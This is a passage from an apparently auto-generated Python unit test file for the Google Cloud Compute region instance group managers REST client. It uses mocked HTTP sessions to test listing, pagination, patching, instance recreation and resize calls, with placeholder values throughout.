response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListErrorsResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.list_errors(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/listErrors"
% client.transport._host,
args[1],
)
def test_list_errors_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_errors(
compute.ListErrorsRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_list_errors_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[
compute.InstanceManagedByIgmError(),
compute.InstanceManagedByIgmError(),
compute.InstanceManagedByIgmError(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[], next_page_token="def",
),
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[compute.InstanceManagedByIgmError(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[
compute.InstanceManagedByIgmError(),
compute.InstanceManagedByIgmError(),
],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagersListErrorsResponse.to_json(x)
for x in response
)
        return_values = tuple(Response() for _ in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
pager = client.list_errors(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.InstanceManagedByIgmError) for i in results)
pages = list(client.list_errors(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_list_managed_instances_rest(
transport: str = "rest",
request_type=compute.ListManagedInstancesRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstancesResponse(
next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstancesResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_managed_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListManagedInstancesPager)
assert response.next_page_token == "next_page_token_value"
def test_list_managed_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.ListManagedInstancesRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_managed_instances(request)
def test_list_managed_instances_rest_from_dict():
test_list_managed_instances_rest(request_type=dict)
def test_list_managed_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstancesResponse()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstancesResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.list_managed_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/listManagedInstances"
% client.transport._host,
args[1],
)
def test_list_managed_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_managed_instances(
compute.ListManagedInstancesRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_list_managed_instances_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[
compute.ManagedInstance(),
compute.ManagedInstance(),
compute.ManagedInstance(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[], next_page_token="def",
),
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[compute.ManagedInstance(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[
compute.ManagedInstance(),
compute.ManagedInstance(),
],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagersListInstancesResponse.to_json(x)
for x in response
)
        return_values = tuple(Response() for _ in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
pager = client.list_managed_instances(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.ManagedInstance) for i in results)
pages = list(client.list_managed_instances(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_list_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.ListPerInstanceConfigsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp(
next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPerInstanceConfigsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.ListPerInstanceConfigsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_per_instance_configs(request)
def test_list_per_instance_configs_rest_from_dict():
test_list_per_instance_configs_rest(request_type=dict)
def test_list_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.list_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/listPerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_list_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_per_instance_configs(
compute.ListPerInstanceConfigsRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_list_per_instance_configs_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[
compute.PerInstanceConfig(),
compute.PerInstanceConfig(),
compute.PerInstanceConfig(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[], next_page_token="def",
),
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[compute.PerInstanceConfig(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[compute.PerInstanceConfig(), compute.PerInstanceConfig(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagersListInstanceConfigsResp.to_json(x)
for x in response
)
        return_values = tuple(Response() for _ in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
pager = client.list_per_instance_configs(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.PerInstanceConfig) for i in results)
pages = list(client.list_per_instance_configs(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_patch_rest(
transport: str = "rest", request_type=compute.PatchRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.patch(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
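# patch() above returns a compute.Operation describing the mutation rather than
# the patched resource. A sketch of checking completion using only the fields the
# test asserts (hypothetical helper; real code would poll until DONE):
def _operation_done(operation):
    return operation.status == compute.Operation.Status.DONE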
def test_patch_rest_bad_request(
transport: str = "rest", request_type=compute.PatchRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.patch(request)
def test_patch_rest_from_dict():
test_patch_rest(request_type=dict)
def test_patch_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
mock_args.update(sample_request)
client.patch(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}"
% client.transport._host,
args[1],
)
def test_patch_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.patch(
compute.PatchRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
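# The patch tests above also show that flattened calls accept full resource
# messages (here instance_group_manager_resource). A sketch of building that
# nested resource exactly as the tests do (values copied from the tests; the
# helper is hypothetical):
def _sample_igm_resource():
    return compute.InstanceGroupManager(
        auto_healing_policies=[
            compute.InstanceGroupManagerAutoHealingPolicy(
                health_check="health_check_value"
            )
        ]
    )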
def test_patch_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.PatchPerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_patch_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.patch_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_patch_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.PatchPerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_patch_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.patch_per_instance_configs(request)
def test_patch_per_instance_configs_rest_from_dict():
test_patch_per_instance_configs_rest(request_type=dict)
def test_patch_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_patch_instance_config_req_resource=compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
mock_args.update(sample_request)
client.patch_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/patchPerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_patch_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.patch_per_instance_configs(
compute.PatchPerInstanceConfigsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_patch_instance_config_req_resource=compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
def test_recreate_instances_rest(
transport: str = "rest",
request_type=compute.RecreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_recreate_request_resource"
] = compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.recreate_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_recreate_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.RecreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_recreate_request_resource"
] = compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.recreate_instances(request)
def test_recreate_instances_rest_from_dict():
test_recreate_instances_rest(request_type=dict)
def test_recreate_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_recreate_request_resource=compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
),
)
mock_args.update(sample_request)
client.recreate_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/recreateInstances"
% client.transport._host,
args[1],
)
def test_recreate_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.recreate_instances(
compute.RecreateInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_recreate_request_resource=compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
),
)
def test_resize_rest(
transport: str = "rest",
request_type=compute.ResizeRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.resize(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_resize_rest_bad_request(
transport: str = "rest",
request_type=compute.ResizeRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.resize(request)
def test_resize_rest_from_dict():
test_resize_rest(request_type=dict)
def test_resize_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
